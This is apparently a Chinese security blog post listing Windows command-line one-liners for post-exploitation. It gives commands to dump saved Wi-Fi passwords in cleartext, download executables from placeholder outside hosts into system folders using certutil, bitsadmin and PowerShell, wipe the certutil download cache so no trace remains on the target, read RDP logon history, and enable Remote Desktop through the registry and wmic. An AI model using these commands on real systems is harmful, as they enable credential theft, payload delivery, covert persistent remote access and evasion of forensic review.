cmd渗透命令集合

释放双眼,带上耳机,听听看~!

cmd下获取历史wife密码

for /f “skip=9 tokens=1,2 delims=:” %i in (‘netsh wlan show profiles’) do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

cmd下载文件

certutil -urlcache -split -f http://xxxxxxxxx/1.exe c:/windows/help/1.exe
bitsadmin /transfer n http://xxx/1.exe c:\windows\help\1.exe
powershell (new-object System.Net.WebClient).DownloadFile(‘http://1.1.1.1/1.exe’, ‘c:\Intel\1.exe’)
certutil.exe -urlcache -split -f http://127.0.0.1/1.txt c:\users\test\desktop\temp.txt

但是在下载完成之后会在%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content 缓存目录中保存下载的文件副本。
可以通过certutil.exe -urlcache * 查看到,所以如不清除,便会在目标机器上留下下载地址。
清除下载缓存命令

certutil.exe -urlcache -f http://127.0.0.1/1.exe delete

cmd查看3389连接历史

powershell “& {Get-EventLog -LogName security -Newest 100 | where {$_.EventID -eq 4624} | format-list -property * | findstr “Address”}”

cmd下开启3389

win7
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

win2003

wmic path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1

win2008

wmic /namespace:\\root\cimv2\terminalservices path ```
win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call setuserauthenticationrequired 1
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
Web安全渗透测试

UEditor .net 前台getshell

2018-8-24 9:27:15

Web安全渗透测试社会工程学

抓取各种密码总结

2018-8-24 9:39:24

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
今日签到
有新私信 私信列表
搜索